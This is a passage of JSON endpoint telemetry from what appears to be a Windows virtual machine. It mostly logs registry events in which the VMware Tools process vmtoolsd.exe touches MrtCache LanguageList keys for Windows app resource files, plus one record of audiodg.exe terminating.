"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570926369984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d33b3b668\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d33b3b668\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570926369984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570926990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5c90e59d93\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5c90e59d93\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570926990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "process", - "pid": 5812, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "subtype": "terminate", - "timestamp": 131883570927150000, - "unique_pid": "{42FC7E13-C9B7-5C05-0000-0010A6AC4901}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570927780000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri\\1d488aa1fd4cc8a\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri\\1d488aa1fd4cc8a\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570927780000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570928250000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d9e6833ee\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d9e6833ee\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570928250000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570929650000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5da4bfd463\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5da4bfd463\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570929650000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570930440000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d7fbd180a\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d7fbd180a\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570930440000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570930740000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri\\1d488a96e81c592\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri\\1d488a96e81c592\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570930740000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570931990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9db3639b\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9db3639b\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570931990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570932460000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97568a9e\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97568a9e\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570932460000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570933550000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri\\1d488aa16ad201f\\5ca31589", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri\\1d488aa16ad201f\\5ca31589\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570933550000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570934020000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri\\1d488aa1d17d17e\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri\\1d488aa1d17d17e\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570934020000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570934490000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c2e6bbc\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c2e6bbc\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570934490000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570934960000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c54e27f\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c54e27f\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570934960000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570935430000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\\1d3d1edaaf6ead6\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\\1d3d1edaaf6ead6\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570935430000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570936360000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cfa173475\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cfa173475\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570936360000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570936990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri\\1d488a9be905cd0\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri\\1d488a9be905cd0\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570936990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570937460000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\\1d3d23f8efa53f1\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\\1d3d23f8efa53f1\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570937460000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570938080000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 